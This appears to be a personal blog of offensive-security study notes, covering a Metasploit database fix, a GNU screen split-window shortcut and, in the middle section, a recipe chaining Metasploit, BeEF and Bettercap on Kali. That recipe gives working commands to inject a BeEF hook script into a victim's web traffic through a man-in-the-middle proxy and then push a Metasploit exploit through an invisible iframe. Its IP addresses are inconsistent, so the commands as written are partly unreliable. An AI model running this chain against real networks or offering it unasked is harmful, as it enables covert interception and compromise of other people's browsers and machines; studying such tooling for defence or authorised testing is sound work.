Fixing “Database not connected or cache not built” in Metasploit

Configure the database service to start automatically
update-rc.d postgresql enable

Initialize the database
msfdb init

Launch msfconsole and rebuild the cache
root@KALI:~# msfconsole
msf > db_rebuild_cache

Wait for awhile. It will finish eventually.

MetaSploit, Bettercap, and BeEf

MetaSploit, Bettercap, and BeEf work well together. Below is the basic syntax I used in Kali. It assumes the default gateway is 192.168.1.1, the Kali host is 192.168.1.50, and the target is 192.168.100.

Start MetaSploit using msgrpc
root@KALI:~#msfconsole
msf >load msgrpc ServerHost=192.168.1.50 Pass=abc123

Start BeEF
root@KALI:~# cd /usr/share/beef-xss
root@KALI:~# ./beef

Copy the hook url from the resulting command output.
(Will look something like this:  http://192.168.1.100:3000/hook.js)

Start bettercap with the arguments to point the target machine to BeEF.
root@KALI:~# bettercap -T 192.168.1.1 -T 192.168.1.100 –proxy-module injectjs –js-url http://192.168.1.100:3000/hook.js

Open up the BeEF Admin URL by browsing to http://192.168.1.50:3000/ui/panel

Assuming a client is hooked, investigate the client to determine likely metasploit options.  Get metasploit. Use the “Create invisible iframe” command to spawn an invisible iframe to the URL of the metasploit exploit.

That’s it.

References:
https://www.metasploit.com/
https://www.bettercap.org/
http://beefproject.com/
https://sathisharthars.com/

The Screen Command

So there are times where I only have a single SSH session but want to be able to monitor multiple running processes. For example, metasploit, beef, and bettercap work well together, but it’s nice to be able to concurrently watch the output of all of them.

So I discovered the screen command. It let’s me split up a single session into multiple smaller sessions.  While it seems really powerful, thus far I’m just using it to give me four sessions at once.

I eventually just memorized the key sequence to get four evenly divided sessions going.

[CTRL]+[a] – (Enter the command mode.)
[SHIFT]+[s] – (Split the window horizontally.)
[CTRL]+[a] – (Enter the command mode.)
[SHIFT]+[\] – (Split the window Vertically.)
[CTRL]+[a] – (Enter the command mode.)
[TAB] – (Move to the next window.)
[CTRL]+[c] – (Launch a shell in the current window.)
[CTRL]+[a] – (Enter the command mode.)
[TAB]- (Move to the next window.)
[CTRL]+[a] – (Enter the command mode.)
[CTRL]+[c] – (Launch a shell in the current window.)
[CTRL]+[a]  – (Enter the command mode.)
[SHIFT]+[\] – (Split the window Vertically.)

References:
https://www.gnu.org/software/screen/manual/screen.html

About Pyrrh1c

The entire purpose of this blog is to track the things I’m learning as I study offensive security. It will act as a reference point for the future.

It’s called Pyrrh1c in reference to the phrase “phyrrhic victory“. I always accomplish my objectives, even if the effort and cost is disproportionate to the goal. So since this study has already occupied a ridiculous amount of my time why not embrace the madness?